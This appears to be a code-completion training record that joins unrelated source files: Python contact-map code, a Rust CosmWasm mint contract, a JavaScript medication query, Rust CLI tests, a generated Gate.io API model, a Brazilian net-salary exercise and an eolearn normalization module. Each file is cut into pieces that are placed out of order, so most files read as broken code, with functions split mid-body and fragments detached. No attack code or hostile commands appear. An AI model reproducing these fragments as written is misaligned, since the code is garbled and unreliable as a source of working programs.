full_mat[6,0:phi_asym.shape[0], 0:phi_asym.shape[1]] = phi_asym
for i in range(7, 47):
full_mat[i, :, :] = seq_mats[i - 7]
return full_mat
def write_pickle_file(full_mat, pdb, ag, out_folder, tag = ''):
|
def write_dist_mat_file(mat, pdb, ag, out_folder, tag = ''):
"""
Writes out a file containing the distance matrix
"""
# output_folder = 'core_contact_maps/dist_mat_txt_folder/'
numpy.set_printoptions(threshold=numpy.inf)
dist_mat_file = pdb.split('.')[0]
dist_mat_file = out_folder + dist_mat_file + '_full_mat_' + ag.getTitle() + tag + '.txt'
with open(dist_mat_file, 'w') as open_file:
for i in mat:
open_file.write(str(i) + '\n')
return
def run_mk_bb_info_mats(workdir, out_path, mat_size = 12, top = 1000, contain_metal = True, opts = None):
os.makedirs(out_path, exist_ok=True)
count = 0
errors = ''
for pdb_name in os.listdir(workdir):
if count >= top:
break
if '.pdb' not in pdb_name:
continue
pdb_file = workdir + pdb_name
pdb = pr.parsePDB(pdb_file)
ags = get_atgs(pdb, contain_metal)
for ag in ags:
try:
#TO DO: currently, only consider 3 or 4 aa binding.
if len(ag.select('name CA'))> 12 or len(ag.select('name CA')) < 7:
print(pdb_name + ' not used. ')
continue
full_mat = mk_full_mats(ag, mat_size)
write_dist_mat_file(full_mat, pdb_name, ag, out_path)
write_pickle_file(full_mat, pdb_name, ag, out_path)
count += 1
except Exception:
print('error: ' + pdb_name)
errors += pdb_name + '\n'
if count >= top:
break
with open(out_path + '_error.txt', 'w') as f:
f.write(errors)
return
| """
Writes a pickle file containing the input numpy array into the current permutation's folder.
Currently using this only to save the full matrix (all 47 channels).
"""
numpy.set_printoptions(threshold=numpy.inf)
pdb_name = pdb.split('.')[0]
pkl_file = out_folder + pdb_name + '_full_mat_' + ag.getTitle() + tag + '.pkl'
with open(pkl_file, 'wb') as f:
print(pkl_file)
pickle.dump(full_mat, f)
return |
contract.rs | use crate::{
asserts::{assert_auction_discount, assert_min_collateral_ratio, assert_protocol_fee},
positions::{
auction, burn, deposit, mint, open_position, query_next_position_idx, query_position,
query_positions, withdraw,
},
querier::load_oracle_feeder,
state::{
read_asset_config, read_config, store_asset_config, store_config, store_position_idx,
AssetConfig, Config,
},
};
#[cfg(not(feature = "library"))]
use cosmwasm_std::entry_point;
use cosmwasm_std::{
attr, from_binary, to_binary, Addr, Binary, CanonicalAddr, CosmosMsg, Decimal, Deps, DepsMut,
Env, MessageInfo, Response, StdError, StdResult, Uint128, WasmMsg,
};
use cw20::Cw20ReceiveMsg;
use mirror_protocol::collateral_oracle::{ExecuteMsg as CollateralOracleExecuteMsg, SourceType};
use mirror_protocol::mint::{
AssetConfigResponse, ConfigResponse, Cw20HookMsg, ExecuteMsg, IPOParams, InstantiateMsg,
MigrateMsg, QueryMsg,
};
use daodiseoswap::asset::{Asset, AssetInfo};
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn instantiate(
deps: DepsMut,
_env: Env,
_info: MessageInfo,
msg: InstantiateMsg,
) -> StdResult<Response> {
let config = Config {
owner: deps.api.addr_canonicalize(&msg.owner)?,
oracle: deps.api.addr_canonicalize(&msg.oracle)?,
collector: deps.api.addr_canonicalize(&msg.collector)?,
collateral_oracle: deps.api.addr_canonicalize(&msg.collateral_oracle)?,
staking: deps.api.addr_canonicalize(&msg.staking)?,
daodiseoswap_factory: deps.api.addr_canonicalize(&msg.daodiseoswap_factory)?,
lock: deps.api.addr_canonicalize(&msg.lock)?,
base_denom: msg.base_denom,
token_code_id: msg.token_code_id,
protocol_fee_rate: assert_protocol_fee(msg.protocol_fee_rate)?,
};
store_config(deps.storage, &config)?;
store_position_idx(deps.storage, Uint128::from(1u128))?;
Ok(Response::default())
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn execute(deps: DepsMut, env: Env, info: MessageInfo, msg: ExecuteMsg) -> StdResult<Response> {
match msg {
ExecuteMsg::Receive(msg) => receive_cw20(deps, env, info, msg),
ExecuteMsg::UpdateConfig {
owner,
oracle,
collector,
collateral_oracle,
daodiseoswap_factory,
lock,
token_code_id,
protocol_fee_rate,
staking,
} => update_config(
deps,
info,
owner,
oracle,
collector,
collateral_oracle,
daodiseoswap_factory,
lock,
token_code_id,
protocol_fee_rate,
staking,
),
ExecuteMsg::UpdateAsset {
asset_token,
auction_discount,
min_collateral_ratio,
ipo_params,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
update_asset(
deps,
info,
asset_addr,
auction_discount,
min_collateral_ratio,
ipo_params,
)
}
ExecuteMsg::RegisterAsset {
asset_token,
auction_discount,
min_collateral_ratio,
ipo_params,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
register_asset(
deps,
info,
asset_addr,
auction_discount,
min_collateral_ratio,
ipo_params,
)
}
ExecuteMsg::RegisterMigration {
asset_token,
end_price,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
register_migration(deps, info, asset_addr, end_price)
}
ExecuteMsg::TriggerIPO { asset_token } => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
trigger_ipo(deps, info, asset_addr)
}
ExecuteMsg::OpenPosition {
collateral,
asset_info,
collateral_ratio,
short_params,
} => {
// only native token can be deposited directly
if !collateral.is_native_token() {
return Err(StdError::generic_err("unauthorized"));
}
// Check the actual deposit happens
collateral.assert_sent_native_token_balance(&info)?;
open_position(
deps,
env,
info.sender,
collateral,
asset_info,
collateral_ratio,
short_params,
)
}
ExecuteMsg::Deposit {
position_idx,
collateral,
} => {
// only native token can be deposited directly
if !collateral.is_native_token() {
return Err(StdError::generic_err("unauthorized"));
}
// Check the actual deposit happens
collateral.assert_sent_native_token_balance(&info)?;
deposit(deps, info.sender, position_idx, collateral)
}
ExecuteMsg::Withdraw {
position_idx,
collateral,
} => withdraw(deps, env, info.sender, position_idx, collateral),
ExecuteMsg::Mint {
position_idx,
asset,
short_params,
} => mint(deps, env, info.sender, position_idx, asset, short_params),
}
}
pub fn receive_cw20(
deps: DepsMut,
env: Env,
info: MessageInfo,
cw20_msg: Cw20ReceiveMsg,
) -> StdResult<Response> {
let passed_asset: Asset = Asset {
info: AssetInfo::Token {
contract_addr: info.sender.to_string(),
},
amount: cw20_msg.amount,
};
match from_binary(&cw20_msg.msg) {
Ok(Cw20HookMsg::OpenPosition {
asset_info,
collateral_ratio,
short_params,
}) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
open_position(
deps,
env,
cw20_sender,
passed_asset,
asset_info,
collateral_ratio,
short_params,
)
}
Ok(Cw20HookMsg::Deposit { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
deposit(deps, cw20_sender, position_idx, passed_asset)
}
Ok(Cw20HookMsg::Burn { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
burn(deps, env, cw20_sender, position_idx, passed_asset)
}
Ok(Cw20HookMsg::Auction { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
auction(deps, env, cw20_sender, position_idx, passed_asset)
}
Err(_) => Err(StdError::generic_err("invalid cw20 hook message")),
}
}
#[allow(clippy::too_many_arguments)]
pub fn update_config(
deps: DepsMut,
info: MessageInfo,
owner: Option<String>,
oracle: Option<String>,
collector: Option<String>,
collateral_oracle: Option<String>,
daodiseoswap_factory: Option<String>,
lock: Option<String>,
token_code_id: Option<u64>,
protocol_fee_rate: Option<Decimal>,
staking: Option<String>,
) -> StdResult<Response> {
let mut config: Config = read_config(deps.storage)?;
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
if let Some(owner) = owner {
config.owner = deps.api.addr_canonicalize(&owner)?;
}
if let Some(oracle) = oracle {
config.oracle = deps.api.addr_canonicalize(&oracle)?;
}
if let Some(collector) = collector {
config.collector = deps.api.addr_canonicalize(&collector)?;
}
if let Some(collateral_oracle) = collateral_oracle {
config.collateral_oracle = deps.api.addr_canonicalize(&collateral_oracle)?;
}
if let Some(daodiseoswap_factory) = daodiseoswap_factory {
config.daodiseoswap_factory = deps.api.addr_canonicalize(&daodiseoswap_factory)?;
}
if let Some(lock) = lock {
config.lock = deps.api.addr_canonicalize(&lock)?;
}
if let Some(token_code_id) = token_code_id {
config.token_code_id = token_code_id;
}
if let Some(protocol_fee_rate) = protocol_fee_rate {
assert_protocol_fee(protocol_fee_rate)?;
config.protocol_fee_rate = protocol_fee_rate;
}
if let Some(staking) = staking {
config.staking = deps.api.addr_canonicalize(&staking)?;
}
store_config(deps.storage, &config)?;
Ok(Response::new().add_attribute("action", "update_config"))
}
pub fn update_asset(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
auction_discount: Option<Decimal>,
min_collateral_ratio: Option<Decimal>,
ipo_params: Option<IPOParams>,
) -> StdResult<Response> {
let config: Config = read_config(deps.storage)?;
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
let mut asset: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
if let Some(auction_discount) = auction_discount {
assert_auction_discount(auction_discount)?;
asset.auction_discount = auction_discount;
}
if let Some(min_collateral_ratio) = min_collateral_ratio {
assert_min_collateral_ratio(min_collateral_ratio)?;
asset.min_collateral_ratio = min_collateral_ratio;
}
|
store_asset_config(deps.storage, &asset_token_raw, &asset)?;
Ok(Response::new().add_attribute("action", "update_asset"))
}
pub fn register_asset(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
auction_discount: Decimal,
min_collateral_ratio: Decimal,
ipo_params: Option<IPOParams>,
) -> StdResult<Response> {
assert_auction_discount(auction_discount)?;
assert_min_collateral_ratio(min_collateral_ratio)?;
let config: Config = read_config(deps.storage)?;
// permission check
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
if read_asset_config(deps.storage, &asset_token_raw).is_ok() {
return Err(StdError::generic_err("Asset was already registered"));
}
let mut messages: Vec<CosmosMsg> = vec![];
// check if it is a preIPO asset
if let Some(params) = ipo_params.clone() {
assert_min_collateral_ratio(params.min_collateral_ratio_after_ipo)?;
} else {
// only non-preIPO assets can be used as collateral
messages.push(CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RegisterCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
multiplier: Decimal::one(), // default collateral multiplier for new mAssets
price_source: SourceType::MirrorOracle {},
})?,
}));
}
// Store temp info into base asset store
store_asset_config(
deps.storage,
&asset_token_raw,
&AssetConfig {
token: deps.api.addr_canonicalize(asset_token.as_str())?,
auction_discount,
min_collateral_ratio,
end_price: None,
ipo_params,
},
)?;
Ok(Response::new()
.add_attributes(vec![
attr("action", "register"),
attr("asset_token", asset_token),
])
.add_messages(messages))
}
pub fn register_migration(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
end_price: Decimal,
) -> StdResult<Response> {
let config = read_config(deps.storage)?;
if config.owner != deps.api.addr_canonicalize(info.sender.as_str())? {
return Err(StdError::generic_err("unauthorized"));
}
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
let asset_config: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
// update asset config
store_asset_config(
deps.storage,
&asset_token_raw,
&AssetConfig {
end_price: Some(end_price),
min_collateral_ratio: Decimal::percent(100),
ipo_params: None,
..asset_config
},
)?;
// flag asset as revoked in the collateral oracle
Ok(Response::new()
.add_messages(vec![CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RevokeCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
})?,
})])
.add_attributes(vec![
attr("action", "migrate_asset"),
attr("asset_token", asset_token.as_str()),
attr("end_price", end_price.to_string()),
]))
}
pub fn trigger_ipo(deps: DepsMut, info: MessageInfo, asset_token: Addr) -> StdResult<Response> {
let config = read_config(deps.storage)?;
let asset_token_raw: CanonicalAddr = deps.api.addr_canonicalize(asset_token.as_str())?;
let oracle_feeder: Addr = load_oracle_feeder(
deps.as_ref(),
deps.api.addr_humanize(&config.oracle)?,
asset_token.clone(),
)?;
// only asset feeder can trigger ipo
if oracle_feeder != info.sender {
return Err(StdError::generic_err("unauthorized"));
}
let mut asset_config: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
let ipo_params: IPOParams = match asset_config.ipo_params {
Some(v) => v,
None => return Err(StdError::generic_err("Asset does not have IPO params")),
};
asset_config.min_collateral_ratio = ipo_params.min_collateral_ratio_after_ipo;
asset_config.ipo_params = None;
store_asset_config(deps.storage, &asset_token_raw, &asset_config)?;
// register asset in collateral oracle
Ok(Response::new()
.add_messages(vec![CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RegisterCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
multiplier: Decimal::one(), // default collateral multiplier for new mAssets
price_source: SourceType::MirrorOracle {},
})?,
})])
.add_attributes(vec![
attr("action", "trigger_ipo"),
attr("asset_token", asset_token.as_str()),
]))
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn query(deps: Deps, _env: Env, msg: QueryMsg) -> StdResult<Binary> {
match msg {
QueryMsg::Config {} => to_binary(&query_config(deps)?),
QueryMsg::AssetConfig { asset_token } => to_binary(&query_asset_config(deps, asset_token)?),
QueryMsg::Position { position_idx } => to_binary(&query_position(deps, position_idx)?),
QueryMsg::Positions {
owner_addr,
asset_token,
start_after,
limit,
order_by,
} => to_binary(&query_positions(
deps,
owner_addr,
asset_token,
start_after,
limit,
order_by,
)?),
QueryMsg::NextPositionIdx {} => to_binary(&query_next_position_idx(deps)?),
}
}
pub fn query_config(deps: Deps) -> StdResult<ConfigResponse> {
let state = read_config(deps.storage)?;
let resp = ConfigResponse {
owner: deps.api.addr_humanize(&state.owner)?.to_string(),
oracle: deps.api.addr_humanize(&state.oracle)?.to_string(),
staking: deps.api.addr_humanize(&state.staking)?.to_string(),
collector: deps.api.addr_humanize(&state.collector)?.to_string(),
collateral_oracle: deps
.api
.addr_humanize(&state.collateral_oracle)?
.to_string(),
daodiseoswap_factory: deps
.api
.addr_humanize(&state.daodiseoswap_factory)?
.to_string(),
lock: deps.api.addr_humanize(&state.lock)?.to_string(),
base_denom: state.base_denom,
token_code_id: state.token_code_id,
protocol_fee_rate: state.protocol_fee_rate,
};
Ok(resp)
}
pub fn query_asset_config(deps: Deps, asset_token: String) -> StdResult<AssetConfigResponse> {
let asset_config: AssetConfig = read_asset_config(
deps.storage,
&deps.api.addr_canonicalize(asset_token.as_str())?,
)?;
let resp = AssetConfigResponse {
token: deps
.api
.addr_humanize(&asset_config.token)
.unwrap()
.to_string(),
auction_discount: asset_config.auction_discount,
min_collateral_ratio: asset_config.min_collateral_ratio,
end_price: asset_config.end_price,
ipo_params: asset_config.ipo_params,
};
Ok(resp)
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn migrate(_deps: DepsMut, _env: Env, _msg: MigrateMsg) -> StdResult<Response> {
Ok(Response::default())
} | if let Some(ipo_params) = ipo_params {
assert_min_collateral_ratio(ipo_params.min_collateral_ratio_after_ipo)?;
asset.ipo_params = Some(ipo_params);
} |
common_medication_map.js | // Reference Number: PDC-055
// Query Title: Most commonly prescribed medication classes
function map(patient) {
var atcLevel = 2; // ATC level; cutoff lengths per the level definitions found on Wikipedia
var atcCutoff = getATCCodeLength(atcLevel);
var drugList = patient.medications();
var now = new Date(2013, 10, 30);
// Shifts date by year, month, and date specified
function addDate(date, y, m, d) {
var n = new Date(date);
n.setFullYear(date.getFullYear() + (y || 0));
n.setMonth(date.getMonth() + (m || 0));
n.setDate(date.getDate() + (d || 0));
return n;
}
// a and b are dates (javascript Date objects or epoch-millisecond timestamps)
// Returns a with the 1.2x calculated date offset added in
function | (a, b) {
var start = new Date(a);
var end = new Date(b);
var diff = Math.floor((end - start) / (1000 * 3600 * 24));
var offset = Math.floor(1.2 * diff);
return addDate(start, 0, 0, offset);
}
function isCurrentDrug(drug) {
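// A drug counts as current if it started on or before the reference date and
// its 1.2x-extended window (see endDateOffset above) has not yet ended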
var drugStart = drug.indicateMedicationStart().getTime();
var drugEnd = drug.indicateMedicationStop().getTime();
return (endDateOffset(drugStart, drugEnd) >= now && drugStart <= now);
}
// Define ATC cutoff levels
function getATCCodeLength(val) {
switch (val) {
case 1:
return 1;
case 2:
return 3;
case 3:
return 4;
case 4:
return 5;
case 5:
return 7;
default:
return 0;
}
}
for (var i = 0; i < drugList.length; i++) {
if (isCurrentDrug(drugList[i])) {
// Get all represented codes for each drug
var codes = drugList[i].medicationInformation().codedProduct();
// Filter out only ATC codes
for (var j = 0; j < codes.length; j++) {
if (codes[j].codeSystemName() !== null &&
codes[j].codeSystemName().toLowerCase() === "whoATC".toLowerCase()) {
// Truncate to appropriate level length
emit(codes[j].code().substring(0, atcCutoff), 1);
}
}
}
}
}
| endDateOffset |
samples.rs | extern crate assert_cli;
#[test]
fn sample1() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd ee
",
)
.stdout()
.is("1")
.unwrap();
}
#[test]
fn sample2() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd aa
", | }
#[test]
fn sample3() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd aaa
",
)
.stdout()
.is("1")
.unwrap();
}
#[test]
fn sample4() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd ee
aa bb cc dd aa
aa bb cc dd aaa
",
)
.stdout()
.is("2")
.unwrap();
}
#[test]
fn puzzle1() {
assert_cli::Assert::main_binary()
.stdin(include_str!("../data/puzzle1.in"))
.stdout()
.is("325")
.unwrap();
} | )
.stdout()
.is("0")
.unwrap(); |
margin_account_book.py | # coding: utf-8
"""
Gate API v4
Welcome to Gate.io API. APIv4 provides spot, margin and futures trading operations. There are public APIs to retrieve the real-time market statistics, and private APIs which need authentication to trade on the user's behalf. # noqa: E501
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from gate_api.configuration import Configuration
class MarginAccountBook(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'time': 'str',
'time_ms': 'int',
'currency': 'str',
'currency_pair': 'str', | attribute_map = {
'id': 'id',
'time': 'time',
'time_ms': 'time_ms',
'currency': 'currency',
'currency_pair': 'currency_pair',
'change': 'change',
'balance': 'balance',
}
def __init__(
self,
id=None,
time=None,
time_ms=None,
currency=None,
currency_pair=None,
change=None,
balance=None,
local_vars_configuration=None,
): # noqa: E501
# type: (str, str, int, str, str, str, str, Configuration) -> None
"""MarginAccountBook - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._time = None
self._time_ms = None
self._currency = None
self._currency_pair = None
self._change = None
self._balance = None
self.discriminator = None
if id is not None:
self.id = id
if time is not None:
self.time = time
if time_ms is not None:
self.time_ms = time_ms
if currency is not None:
self.currency = currency
if currency_pair is not None:
self.currency_pair = currency_pair
if change is not None:
self.change = change
if balance is not None:
self.balance = balance
@property
def id(self):
"""Gets the id of this MarginAccountBook. # noqa: E501
Balance change record ID # noqa: E501
:return: The id of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this MarginAccountBook.
Balance change record ID # noqa: E501
:param id: The id of this MarginAccountBook. # noqa: E501
:type: str
"""
self._id = id
@property
def time(self):
"""Gets the time of this MarginAccountBook. # noqa: E501
Balance changed timestamp # noqa: E501
:return: The time of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this MarginAccountBook.
Balance changed timestamp # noqa: E501
:param time: The time of this MarginAccountBook. # noqa: E501
:type: str
"""
self._time = time
@property
def time_ms(self):
"""Gets the time_ms of this MarginAccountBook. # noqa: E501
The timestamp of the change (in milliseconds) # noqa: E501
:return: The time_ms of this MarginAccountBook. # noqa: E501
:rtype: int
"""
return self._time_ms
@time_ms.setter
def time_ms(self, time_ms):
"""Sets the time_ms of this MarginAccountBook.
The timestamp of the change (in milliseconds) # noqa: E501
:param time_ms: The time_ms of this MarginAccountBook. # noqa: E501
:type: int
"""
self._time_ms = time_ms
@property
def currency(self):
"""Gets the currency of this MarginAccountBook. # noqa: E501
Currency changed # noqa: E501
:return: The currency of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this MarginAccountBook.
Currency changed # noqa: E501
:param currency: The currency of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency = currency
@property
def currency_pair(self):
"""Gets the currency_pair of this MarginAccountBook. # noqa: E501
Account currency pair # noqa: E501
:return: The currency_pair of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency_pair
@currency_pair.setter
def currency_pair(self, currency_pair):
"""Sets the currency_pair of this MarginAccountBook.
Account currency pair # noqa: E501
:param currency_pair: The currency_pair of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency_pair = currency_pair
@property
def change(self):
"""Gets the change of this MarginAccountBook. # noqa: E501
Amount changed. A positive value means a transfer in, a negative value a transfer out # noqa: E501
:return: The change of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._change
@change.setter
def change(self, change):
"""Sets the change of this MarginAccountBook.
Amount changed. A positive value means a transfer in, a negative value a transfer out # noqa: E501
:param change: The change of this MarginAccountBook. # noqa: E501
:type: str
"""
self._change = change
@property
def balance(self):
"""Gets the balance of this MarginAccountBook. # noqa: E501
Balance after change # noqa: E501
:return: The balance of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this MarginAccountBook.
Balance after change # noqa: E501
:param balance: The balance of this MarginAccountBook. # noqa: E501
:type: str
"""
self._balance = balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MarginAccountBook):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MarginAccountBook):
return True
return self.to_dict() != other.to_dict() | 'change': 'str',
'balance': 'str',
}
|
exercicio11.js | /*
A person who works under a signed labor contract in Brazil has INSS and IR deducted from their gross salary. Write a program that, given a gross salary, calculates the net amount to be received.
The notation for a salary of R$ 1500.10, for example, must be 1500.10. For the tax brackets, use the following references:
INSS (Instituto Nacional do Seguro Social)
Gross salary up to R$ 1,556.94: 8% rate
Gross salary from R$ 1,556.95 to R$ 2,594.92: 9% rate
Gross salary from R$ 2,594.93 to R$ 5,189.82: 11% rate
Gross salary above R$ 5,189.82: maximum contribution of R$ 570.88
IR (Income Tax)
Up to R$ 1,903.98: exempt from income tax
From R$ 1,903.99 to R$ 2,826.65: 7.5% rate with R$ 142.80 deducted from the tax
From R$ 2,826.66 to R$ 3,751.05: 15% rate with R$ 354.80 deducted from the tax
From R$ 3,751.06 to R$ 4,664.68: 22.5% rate with R$ 636.13 deducted from the tax
Above R$ 4,664.68: 27.5% rate with R$ 869.36 deducted from the tax.
Example: a person has a gross salary of R$ 3,000.00. The calculation is:
The gross salary is between R$ 2,594.93 and R$ 5,189.82, so the INSS rate is 11%. The INSS is 11% of R$ 3,000.00, i.e., R$ 330.00.
To get the base salary, subtract the INSS amount from the gross salary: R$ 3,000.00 - R$ 330.00 = R$ 2,670.00.
For the IR amount, the salary (with INSS already deducted) is between R$ 1,903.99 and R$ 2,826.65, so the rate is 7.5%, with R$ 142.80 to be deducted from the tax. So we have:
R$ 2,670.00: salary with INSS already deducted;
7.5%: income tax rate;
R$ 142.80: amount to deduct from the tax.
Doing the math: (7.5% of R$ 2,670.00) - R$ 142.80 = R$ 57.45
The final step to get the net salary is R$ 2,670.00 - R$ 57.45 (base salary - IR amount) = R$ 2,612.55.
Result: R$ 2,612.55.
Tip: how about naming the tax rates with descriptive variables?
*/
let aliquotaINSS;
let aliquotaIR;
let salarioBruto = 2000.00;
if (salarioBruto <= 1556.94) {
aliquotaINSS = salarioBruto * 0.08;
} else if (salarioBruto <= 2594.92) {
aliquotaINSS = salarioBruto * 0.09;
} else if (salarioBruto <= 5189.82) {
aliquotaINSS = salarioBruto * 0.11;
} else {
aliquotaINSS = 570.88;
}
let salarioBase = salarioBruto - aliquotaINSS;
if (salarioBase <= 1903.98) {
aliquotaIR = 0;
} else if (salarioBase <= 2826.65) {
aliquotaIR = (salarioBase * 0.075) - 142.80; | aliquotaIR = (salarioBase * 0.225) - 636.13;
} else {
aliquotaIR = (salarioBase * 0.275) - 869.36;
}
let salarioLiquido = salarioBase - aliquotaIR;
console.log (salarioLiquido); | } else if (salarioBase <= 3751.05) {
aliquotaIR = (salarioBase * 0.15) - 354.80;
} else if (salarioBase <= 4664.68) { |
radiometric_normalization.py | """
Module for radiometric normalization
Credits:
Copyright (c) 2018-2019 Johannes Schmid (GeoVille)
Copyright (c) 2017-2019 Matej Aleksandrov, Matic Lubej, Devis Peresutti (Sinergise)
This source code is licensed under the MIT license found in the LICENSE
file in the root directory of this source tree.
"""
import numpy as np
from eolearn.core import EOTask, FeatureType
class ReferenceScenes(EOTask):
""" Creates a layer of reference scenes which have the highest fraction of valid pixels.
The number of reference scenes is limited to a definable number.
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Name of the eopatch data layer. Needs to be of the FeatureType "DATA".
:type feature: (FeatureType, str) or (FeatureType, str, str)
:param valid_fraction_feature: Name of the layer containing the valid fraction obtained with the EOTask
'AddValidDataFraction'. Needs to be of the FeatureType "SCALAR".
:type valid_fraction_feature: (FeatureType, str)
:param max_scene_number: Maximum number of reference scenes taken for the creation of the composite. By default,
the maximum number of scenes equals the number of time frames
:type max_scene_number: int
"""
def __init__(self, feature, valid_fraction_feature, max_scene_number=None):
self.feature = self._parse_features(feature, new_names=True,
default_feature_type=FeatureType.DATA,
rename_function='{}_REFERENCE'.format)
self.valid_fraction_feature = self._parse_features(valid_fraction_feature,
default_feature_type=FeatureType.SCALAR)
self.number = max_scene_number
def execute(self, eopatch):
feature_type, feature_name, new_feature_name = next(self.feature(eopatch))
valid_fraction_feature_type, valid_fraction_feature_name = next(self.valid_fraction_feature(eopatch))
valid_frac = list(eopatch[valid_fraction_feature_type][valid_fraction_feature_name].flatten())
data = eopatch[feature_type][feature_name]
number = data.shape[0] if self.number is None else self.number
eopatch[feature_type][new_feature_name] = np.array([data[x] for _, x in
sorted(zip(valid_frac, range(data.shape[0])), reverse=True)
if x <= number-1])
return eopatch
class BaseCompositing(EOTask):
""" Base class to create a composite of reference scenes
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Feature holding the input time-series. Default type is FeatureType.DATA
:type feature: (FeatureType, str)
:param feature_composite: Type and name of output composite image. Default type is FeatureType.DATA_TIMELESS
:type feature_composite: (FeatureType, str)
:param percentile: Percentile along the time dimension used for compositing. Methods use different percentiles
:type percentile: int or list
:param max_index: Value used to flag indices with NaNs. Could be integer or NaN. Default is 255
:type max_index: int or NaN
:param interpolation: Method used to compute percentile. Allowed values are {'geoville', 'linear', 'lower',
'higher', 'midpoint', 'nearest'}. 'geoville' interpolation performs a custom
implementation, while the other methods use the numpy `percentile` function. Default is
'lower'
:type interpolation: str
:param no_data_value: Value in the composite assigned to non valid data points. Default is NaN
:type no_data_value: float or NaN
"""
def __init__(self, feature, feature_composite, percentile=None, max_index=255, interpolation='lower',
no_data_value=np.nan):
self.feature = self._parse_features(feature,
default_feature_type=FeatureType.DATA,
rename_function='{}_COMPOSITE'.format)
self.composite_type, self.composite_name = next(
self._parse_features(feature_composite, default_feature_type=FeatureType.DATA_TIMELESS)())
self.percentile = percentile
self.max_index = max_index
self.interpolation = interpolation
self._index_by_percentile = self._geoville_index_by_percentile \
if self.interpolation.lower() == 'geoville' else self._numpy_index_by_percentile
self.no_data_value = no_data_value
def _numpy_index_by_percentile(self, data, percentile):
""" Calculate percentile of numpy stack and return the index of the chosen pixel.
numpy percentile function is used with one of the following interpolations {'linear', 'lower', 'higher',
'midpoint', 'nearest'}
"""
data_perc_low = np.nanpercentile(data, percentile, axis=0, interpolation=self.interpolation)
abs_diff = np.where(np.isnan(data_perc_low), np.inf, abs(data - data_perc_low))
# per pixel, pick the frame closest to the percentile value; all-NaN pixels are flagged with max_index
